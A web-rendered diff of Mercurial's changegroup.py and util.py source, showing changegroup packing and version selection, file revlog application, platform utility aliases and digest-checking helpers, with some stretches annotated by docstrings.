720 fclnodes = fnodes.setdefault(f, {})
728 fclnode = fclnodes.setdefault(n, clnode)
721 fclnode = fclnodes.setdefault(n, clnode)
729 if clrevorder[clnode] < clrevorder[fclnode]:
722 if clrevorder[clnode] < clrevorder[fclnode]:
730 fclnodes[n] = clnode
723 fclnodes[n] = clnode
731 return clnode
724 return clnode
732 return lookupmflinknode
725 return lookupmflinknode
733
726
734 size = 0
727 size = 0
735 while tmfnodes:
728 while tmfnodes:
736 dir, nodes = tmfnodes.popitem()
729 dir, nodes = tmfnodes.popitem()
737 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
730 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
738 if not dir or prunednodes:
731 if not dir or prunednodes:
739 for x in self._packmanifests(dir, prunednodes,
732 for x in self._packmanifests(dir, prunednodes,
740 makelookupmflinknode(dir, nodes)):
733 makelookupmflinknode(dir, nodes)):
741 size += len(x)
734 size += len(x)
742 yield x
735 yield x
743 self._verbosenote(_('%8.i (manifests)\n') % size)
736 self._verbosenote(_('%8.i (manifests)\n') % size)
744 yield self._manifestsdone()
737 yield self._manifestsdone()
745
738
746 # The 'source' parameter is useful for extensions
739 # The 'source' parameter is useful for extensions
747 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
740 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
748 repo = self._repo
741 repo = self._repo
749 progress = self._progress
742 progress = self._progress
750 msgbundling = _('bundling')
743 msgbundling = _('bundling')
751
744
752 total = len(changedfiles)
745 total = len(changedfiles)
753 # for progress output
746 # for progress output
754 msgfiles = _('files')
747 msgfiles = _('files')
755 for i, fname in enumerate(sorted(changedfiles)):
748 for i, fname in enumerate(sorted(changedfiles)):
756 filerevlog = repo.file(fname)
749 filerevlog = repo.file(fname)
757 if not filerevlog:
750 if not filerevlog:
758 raise error.Abort(_("empty or missing revlog for %s") % fname)
751 raise error.Abort(_("empty or missing revlog for %s") % fname)
759
752
760 linkrevnodes = linknodes(filerevlog, fname)
753 linkrevnodes = linknodes(filerevlog, fname)
761 # Lookup for filenodes, we collected the linkrev nodes above in the
754 # Lookup for filenodes, we collected the linkrev nodes above in the
762 # fastpath case and with lookupmf in the slowpath case.
755 # fastpath case and with lookupmf in the slowpath case.
763 def lookupfilelog(x):
756 def lookupfilelog(x):
764 return linkrevnodes[x]
757 return linkrevnodes[x]
765
758
766 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
759 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
767 if filenodes:
760 if filenodes:
768 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
761 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
769 total=total)
762 total=total)
770 h = self.fileheader(fname)
763 h = self.fileheader(fname)
771 size = len(h)
764 size = len(h)
772 yield h
765 yield h
773 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
766 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
774 size += len(chunk)
767 size += len(chunk)
775 yield chunk
768 yield chunk
776 self._verbosenote(_('%8.i %s\n') % (size, fname))
769 self._verbosenote(_('%8.i %s\n') % (size, fname))
777 progress(msgbundling, None)
770 progress(msgbundling, None)
778
771
779 def deltaparent(self, revlog, rev, p1, p2, prev):
772 def deltaparent(self, revlog, rev, p1, p2, prev):
780 return prev
773 return prev
781
774
782 def revchunk(self, revlog, rev, prev, linknode):
775 def revchunk(self, revlog, rev, prev, linknode):
783 node = revlog.node(rev)
776 node = revlog.node(rev)
784 p1, p2 = revlog.parentrevs(rev)
777 p1, p2 = revlog.parentrevs(rev)
785 base = self.deltaparent(revlog, rev, p1, p2, prev)
778 base = self.deltaparent(revlog, rev, p1, p2, prev)
786
779
787 prefix = ''
780 prefix = ''
788 if revlog.iscensored(base) or revlog.iscensored(rev):
781 if revlog.iscensored(base) or revlog.iscensored(rev):
789 try:
782 try:
790 delta = revlog.revision(node, raw=True)
783 delta = revlog.revision(node, raw=True)
791 except error.CensoredNodeError as e:
784 except error.CensoredNodeError as e:
792 delta = e.tombstone
785 delta = e.tombstone
793 if base == nullrev:
786 if base == nullrev:
794 prefix = mdiff.trivialdiffheader(len(delta))
787 prefix = mdiff.trivialdiffheader(len(delta))
795 else:
788 else:
796 baselen = revlog.rawsize(base)
789 baselen = revlog.rawsize(base)
797 prefix = mdiff.replacediffheader(baselen, len(delta))
790 prefix = mdiff.replacediffheader(baselen, len(delta))
798 elif base == nullrev:
791 elif base == nullrev:
799 delta = revlog.revision(node, raw=True)
792 delta = revlog.revision(node, raw=True)
800 prefix = mdiff.trivialdiffheader(len(delta))
793 prefix = mdiff.trivialdiffheader(len(delta))
801 else:
794 else:
802 delta = revlog.revdiff(base, rev)
795 delta = revlog.revdiff(base, rev)
803 p1n, p2n = revlog.parents(node)
796 p1n, p2n = revlog.parents(node)
804 basenode = revlog.node(base)
797 basenode = revlog.node(base)
805 flags = revlog.flags(rev)
798 flags = revlog.flags(rev)
806 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
799 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
807 meta += prefix
800 meta += prefix
808 l = len(meta) + len(delta)
801 l = len(meta) + len(delta)
809 yield chunkheader(l)
802 yield chunkheader(l)
810 yield meta
803 yield meta
811 yield delta
804 yield delta
812 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
805 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
813 # do nothing with basenode, it is implicitly the previous one in HG10
806 # do nothing with basenode, it is implicitly the previous one in HG10
814 # do nothing with flags, it is implicitly 0 for cg1 and cg2
807 # do nothing with flags, it is implicitly 0 for cg1 and cg2
815 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
808 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
816
809
817 class cg2packer(cg1packer):
810 class cg2packer(cg1packer):
818 version = '02'
811 version = '02'
819 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
812 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
820
813
821 def __init__(self, repo, bundlecaps=None):
814 def __init__(self, repo, bundlecaps=None):
822 super(cg2packer, self).__init__(repo, bundlecaps)
815 super(cg2packer, self).__init__(repo, bundlecaps)
823 if self._reorder is None:
816 if self._reorder is None:
824 # Since generaldelta is directly supported by cg2, reordering
817 # Since generaldelta is directly supported by cg2, reordering
825 # generally doesn't help, so we disable it by default (treating
818 # generally doesn't help, so we disable it by default (treating
826 # bundle.reorder=auto just like bundle.reorder=False).
819 # bundle.reorder=auto just like bundle.reorder=False).
827 self._reorder = False
820 self._reorder = False
828
821
829 def deltaparent(self, revlog, rev, p1, p2, prev):
822 def deltaparent(self, revlog, rev, p1, p2, prev):
830 dp = revlog.deltaparent(rev)
823 dp = revlog.deltaparent(rev)
831 if dp == nullrev and revlog.storedeltachains:
824 if dp == nullrev and revlog.storedeltachains:
832 # Avoid sending full revisions when delta parent is null. Pick prev
825 # Avoid sending full revisions when delta parent is null. Pick prev
833 # in that case. It's tempting to pick p1 in this case, as p1 will
826 # in that case. It's tempting to pick p1 in this case, as p1 will
834 # be smaller in the common case. However, computing a delta against
827 # be smaller in the common case. However, computing a delta against
835 # p1 may require resolving the raw text of p1, which could be
828 # p1 may require resolving the raw text of p1, which could be
836 # expensive. The revlog caches should have prev cached, meaning
829 # expensive. The revlog caches should have prev cached, meaning
837 # less CPU for changegroup generation. There is likely room to add
830 # less CPU for changegroup generation. There is likely room to add
838 # a flag and/or config option to control this behavior.
831 # a flag and/or config option to control this behavior.
839 return prev
832 return prev
840 elif dp == nullrev:
833 elif dp == nullrev:
841 # revlog is configured to use full snapshot for a reason,
834 # revlog is configured to use full snapshot for a reason,
842 # stick to full snapshot.
835 # stick to full snapshot.
843 return nullrev
836 return nullrev
844 elif dp not in (p1, p2, prev):
837 elif dp not in (p1, p2, prev):
845 # Pick prev when we can't be sure remote has the base revision.
838 # Pick prev when we can't be sure remote has the base revision.
846 return prev
839 return prev
847 else:
840 else:
848 return dp
841 return dp
849
842
850 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
843 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
851 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
844 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
852 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
845 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
853
846
854 class cg3packer(cg2packer):
847 class cg3packer(cg2packer):
855 version = '03'
848 version = '03'
856 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
849 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
857
850
858 def _packmanifests(self, dir, mfnodes, lookuplinknode):
851 def _packmanifests(self, dir, mfnodes, lookuplinknode):
859 if dir:
852 if dir:
860 yield self.fileheader(dir)
853 yield self.fileheader(dir)
861
854
862 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
855 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
863 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
856 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
864 units=_('manifests')):
857 units=_('manifests')):
865 yield chunk
858 yield chunk
866
859
867 def _manifestsdone(self):
860 def _manifestsdone(self):
868 return self.close()
861 return self.close()
869
862
870 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
863 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
871 return struct.pack(
864 return struct.pack(
872 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
865 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
873
866
874 _packermap = {'01': (cg1packer, cg1unpacker),
867 _packermap = {'01': (cg1packer, cg1unpacker),
875 # cg2 adds support for exchanging generaldelta
868 # cg2 adds support for exchanging generaldelta
876 '02': (cg2packer, cg2unpacker),
869 '02': (cg2packer, cg2unpacker),
877 # cg3 adds support for exchanging revlog flags and treemanifests
870 # cg3 adds support for exchanging revlog flags and treemanifests
878 '03': (cg3packer, cg3unpacker),
871 '03': (cg3packer, cg3unpacker),
879 }
872 }
880
873
881 def allsupportedversions(repo):
874 def allsupportedversions(repo):
882 versions = set(_packermap.keys())
875 versions = set(_packermap.keys())
883 if not (repo.ui.configbool('experimental', 'changegroup3') or
876 if not (repo.ui.configbool('experimental', 'changegroup3') or
884 repo.ui.configbool('experimental', 'treemanifest') or
877 repo.ui.configbool('experimental', 'treemanifest') or
885 'treemanifest' in repo.requirements):
878 'treemanifest' in repo.requirements):
886 versions.discard('03')
879 versions.discard('03')
887 return versions
880 return versions
888
881
889 # Changegroup versions that can be applied to the repo
882 # Changegroup versions that can be applied to the repo
890 def supportedincomingversions(repo):
883 def supportedincomingversions(repo):
891 return allsupportedversions(repo)
884 return allsupportedversions(repo)
892
885
893 # Changegroup versions that can be created from the repo
886 # Changegroup versions that can be created from the repo
894 def supportedoutgoingversions(repo):
887 def supportedoutgoingversions(repo):
895 versions = allsupportedversions(repo)
888 versions = allsupportedversions(repo)
896 if 'treemanifest' in repo.requirements:
889 if 'treemanifest' in repo.requirements:
897 # Versions 01 and 02 support only flat manifests and it's just too
890 # Versions 01 and 02 support only flat manifests and it's just too
898 # expensive to convert between the flat manifest and tree manifest on
891 # expensive to convert between the flat manifest and tree manifest on
899 # the fly. Since tree manifests are hashed differently, all of history
892 # the fly. Since tree manifests are hashed differently, all of history
900 # would have to be converted. Instead, we simply don't even pretend to
893 # would have to be converted. Instead, we simply don't even pretend to
901 # support versions 01 and 02.
894 # support versions 01 and 02.
902 versions.discard('01')
895 versions.discard('01')
903 versions.discard('02')
896 versions.discard('02')
904 return versions
897 return versions
905
898
906 def localversion(repo):
899 def localversion(repo):
907 # Finds the best version to use for bundles that are meant to be used
900 # Finds the best version to use for bundles that are meant to be used
908 # locally, such as those from strip and shelve, and temporary bundles.
901 # locally, such as those from strip and shelve, and temporary bundles.
909 return max(supportedoutgoingversions(repo))
902 return max(supportedoutgoingversions(repo))
910
903
911 def safeversion(repo):
904 def safeversion(repo):
912 # Finds the smallest version that it's safe to assume clients of the repo
905 # Finds the smallest version that it's safe to assume clients of the repo
913 # will support. For example, all hg versions that support generaldelta also
906 # will support. For example, all hg versions that support generaldelta also
914 # support changegroup 02.
907 # support changegroup 02.
915 versions = supportedoutgoingversions(repo)
908 versions = supportedoutgoingversions(repo)
916 if 'generaldelta' in repo.requirements:
909 if 'generaldelta' in repo.requirements:
917 versions.discard('01')
910 versions.discard('01')
918 assert versions
911 assert versions
919 return min(versions)
912 return min(versions)
920
913
921 def getbundler(version, repo, bundlecaps=None):
914 def getbundler(version, repo, bundlecaps=None):
922 assert version in supportedoutgoingversions(repo)
915 assert version in supportedoutgoingversions(repo)
923 return _packermap[version][0](repo, bundlecaps)
916 return _packermap[version][0](repo, bundlecaps)
924
917
925 def getunbundler(version, fh, alg, extras=None):
918 def getunbundler(version, fh, alg, extras=None):
926 return _packermap[version][1](fh, alg, extras=extras)
919 return _packermap[version][1](fh, alg, extras=extras)
927
920
928 def _changegroupinfo(repo, nodes, source):
921 def _changegroupinfo(repo, nodes, source):
929 if repo.ui.verbose or source == 'bundle':
922 if repo.ui.verbose or source == 'bundle':
930 repo.ui.status(_("%d changesets found\n") % len(nodes))
923 repo.ui.status(_("%d changesets found\n") % len(nodes))
931 if repo.ui.debugflag:
924 if repo.ui.debugflag:
932 repo.ui.debug("list of changesets:\n")
925 repo.ui.debug("list of changesets:\n")
933 for node in nodes:
926 for node in nodes:
934 repo.ui.debug("%s\n" % hex(node))
927 repo.ui.debug("%s\n" % hex(node))
935
928
def makechangegroup(repo, outgoing, version, source, fastpath=False,
                    bundlecaps=None):
    """Build a changegroup for ``outgoing`` and return it as an unbundler.

    The raw stream from makestream() is buffered with util.chunkbuffer and
    wrapped so callers can consume it through the unbundler interface.
    """
    stream = makestream(repo, outgoing, version, source,
                        fastpath=fastpath, bundlecaps=bundlecaps)
    extras = {'clcount': len(outgoing.missing)}
    return getunbundler(version, util.chunkbuffer(stream), None, extras)
942
935
def makestream(repo, outgoing, version, source, fastpath=False,
               bundlecaps=None):
    """Return a raw changegroup byte stream for the outgoing changesets.

    Fires the 'preoutgoing' hook (which may abort) and reports the
    changeset count before generation starts.
    """
    packer = getbundler(version, repo, bundlecaps=bundlecaps)

    repo = repo.unfiltered()
    common = outgoing.common
    missing = outgoing.missing
    heads = outgoing.missingheads
    # Take the fast path when explicitly requested, or when every
    # (unfiltered) head was requested -- then we know all linkrevs will
    # be pulled by the client.
    heads.sort()
    uselinkrevfastpath = fastpath or (
        repo.filtername is None and heads == sorted(repo.heads()))

    repo.hook('preoutgoing', throw=True, source=source)
    _changegroupinfo(repo, missing, source)
    return packer.generate(common, missing, uselinkrevfastpath, source)
961
954
def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles):
    """Apply the per-file revlog groups from ``source`` to ``repo``.

    ``revmap`` and ``trp`` are passed straight through to
    ``filelog.addgroup``.  ``expectedfiles`` only drives the progress bar.
    ``needfiles`` maps filenames to the set of nodes that must arrive in
    this changegroup; entries are ticked off as revisions are added and
    any node still missing at the end aborts the operation.

    Returns a ``(revisions, files)`` tuple: total file revisions added and
    number of files touched.
    """
    revisions = 0
    files = 0
    # source.filelogheader() returns {} once the last filelog is consumed
    for chunkdata in iter(source.filelogheader, {}):
        files += 1
        f = chunkdata["filename"]
        repo.ui.debug("adding %s revisions\n" % f)
        repo.ui.progress(_('files'), files, unit=_('files'),
                         total=expectedfiles)
        fl = repo.file(f)
        o = len(fl)  # revision count before this group is applied
        try:
            deltas = source.deltaiter()
            if not fl.addgroup(deltas, revmap, trp):
                raise error.Abort(_("received file revlog group is empty"))
        except error.CensoredBaseError as e:
            raise error.Abort(_("received delta base is censored: %s") % e)
        revisions += len(fl) - o
        if f in needfiles:
            needs = needfiles[f]
            # every newly added node must have been expected; anything
            # else means the sender pushed data we did not ask for
            for new in xrange(o, len(fl)):
                n = fl.node(new)
                if n in needs:
                    needs.remove(n)
                else:
                    raise error.Abort(
                        _("received spurious file revlog entry"))
            if not needs:
                del needfiles[f]
    repo.ui.progress(_('files'), None)

    # whatever is left in needfiles was promised but never received
    for f, needs in needfiles.iteritems():
        fl = repo.file(f)
        for n in needs:
            try:
                fl.rev(n)
            except error.LookupError:
                raise error.Abort(
                    _('missing file data for %s:%s - run hg verify') %
                    (f, hex(n)))

    return revisions, files
@@ -1,3867 +1,3876 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import itertools
29 import itertools
30 import mmap
30 import mmap
31 import os
31 import os
32 import platform as pyplatform
32 import platform as pyplatform
33 import re as remod
33 import re as remod
34 import shutil
34 import shutil
35 import signal
35 import signal
36 import socket
36 import socket
37 import stat
37 import stat
38 import string
38 import string
39 import subprocess
39 import subprocess
40 import sys
40 import sys
41 import tempfile
41 import tempfile
42 import textwrap
42 import textwrap
43 import time
43 import time
44 import traceback
44 import traceback
45 import warnings
45 import warnings
46 import zlib
46 import zlib
47
47
48 from . import (
48 from . import (
49 encoding,
49 encoding,
50 error,
50 error,
51 i18n,
51 i18n,
52 node as nodemod,
52 node as nodemod,
53 policy,
53 policy,
54 pycompat,
54 pycompat,
55 urllibcompat,
55 urllibcompat,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
def isatty(fp):
    """Return True if ``fp`` reports being attached to a terminal.

    Objects without an ``isatty`` method are treated as non-ttys.
    """
    method = getattr(fp, 'isatty', None)
    if method is None:
        return False
    return method()
89
89
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    # reopen stdout line-buffered (bufsize=1) before anything writes to it
    stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)

if pycompat.iswindows:
    from . import windows as platform
    # wrap stdout with the Windows-specific workaround object
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform

# gettext shortcut used throughout this module
_ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 spawndetached = platform.spawndetached
150 spawndetached = platform.spawndetached
151 split = platform.split
151 split = platform.split
152 sshargs = platform.sshargs
152 sshargs = platform.sshargs
153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
153 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statisexec = platform.statisexec
154 statisexec = platform.statisexec
155 statislink = platform.statislink
155 statislink = platform.statislink
156 testpid = platform.testpid
156 testpid = platform.testpid
157 umask = platform.umask
157 umask = platform.umask
158 unlink = platform.unlink
158 unlink = platform.unlink
159 username = platform.username
159 username = platform.username
160
160
# These osutil helpers only exist on some platforms / policy builds;
# re-export each one when available and silently skip it otherwise.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass
173
173
# Python compatibility

# unique sentinel used by safehasattr() to detect a missing attribute
_notset = object()

# disable Python's problematic floating point timestamps (issue4836)
# (Python hypocritically says you shouldn't change this behavior in
# libraries, and sure enough Mercurial is not a library.)
os.stat_float_times(False)
182
182
def safehasattr(thing, attr):
    """Check whether ``thing`` has attribute ``attr``.

    Uses ``getattr`` with a sentinel default, so only a genuinely absent
    attribute counts as missing.
    """
    sentinel = object()
    return getattr(thing, attr, sentinel) is not sentinel
185
185
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt via ``fout``, read a reply from ``fin``, return it as bytes.

    Temporarily rebinds ``sys.stdin``/``sys.stdout`` to wrapped versions
    of the given streams while rawinput() runs, and always restores the
    originals afterwards.
    """
    origin, origout = sys.stdin, sys.stdout
    try:
        sys.stdin = encoding.strio(fin)
        sys.stdout = encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = origin, origout
193
193
def bitsfrom(container):
    """Return the bitwise OR of every element of ``container``.

    An empty container yields 0.
    """
    result = 0
    for flag in container:
        result |= flag
    return result
199
199
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
# _dowarn also gates nouideprecwarn() below.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
214
214
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    suffix = ("\n(compatibility will be dropped after Mercurial-%s,"
              " update your code.)") % version
    warnings.warn(msg + suffix, DeprecationWarning, stacklevel + 1)
224
224
# digest algorithms available to digester, keyed by name
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# sanity check: every preference entry must have an implementation
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
235
235
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # one live hash object per requested digest name
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """feed ``data`` to every tracked hash object"""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """return the hex digest accumulated so far for ``key``"""
        if key not in DIGESTS:
            # bug fix: the message previously interpolated ``k``, a stale
            # module-level loop variable, so it always reported the last
            # entry of DIGESTS_BY_STRENGTH instead of the requested name
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
282
282
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        # wrapped file handle and the size/digests it must match
        self._fh = fh
        self._size = size
        self._digests = dict(digests)
        # running byte count and hash state, updated by read()
        self._got = 0
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """read from the wrapped handle, updating count and digests"""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """abort unless the observed size and every digest match"""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if expected != actual:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
314
314
try:
    buffer = buffer
except NameError:
    # Python 3 has no builtin buffer(); emulate it with memoryview slicing
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

# passed as close_fds= to the subprocess.Popen calls below
closefds = pycompat.isposix

# read size used by bufferedinputpipe._fillbuffer
_chunksize = 4096
326
326
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

